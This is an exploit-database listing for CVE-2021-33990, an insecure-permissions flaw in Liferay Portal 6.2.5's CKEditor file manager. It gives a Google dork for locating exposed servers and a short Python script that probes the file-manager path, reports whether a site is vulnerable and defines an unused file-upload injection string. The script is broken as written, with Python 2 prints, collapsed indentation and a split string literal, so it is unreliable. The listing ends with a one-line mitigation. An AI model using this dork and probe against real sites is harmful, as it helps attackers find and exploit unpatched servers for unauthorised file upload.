Share
## https://sploitus.com/exploit?id=PACKETSTORM:171701
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions  
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/  
# Date: 2021/05  
# Exploit Author: fu2x2000  
# Version: Liferay Portal 6.2.5 or later  
# CVE : CVE-2021-33990  
  
import requests  
import json  
  
print (" Search this on Google #Dork for liferay  
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")  
  
url ="URL Goes Here  
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"  
req = requests.get(url)  
print req  
sta = req.status_code  
if sta == 200:  
print ('Life Vulnerability exists')  
cook = url  
print cook  
inject = "Command=FileUpload&Type=File&CurrentFolder=/"  
#cook_inject = cook+inject  
#print cook_inject  
else:  
print ('not found try a another method')  
  
  
print ("solution restrict access and user groups")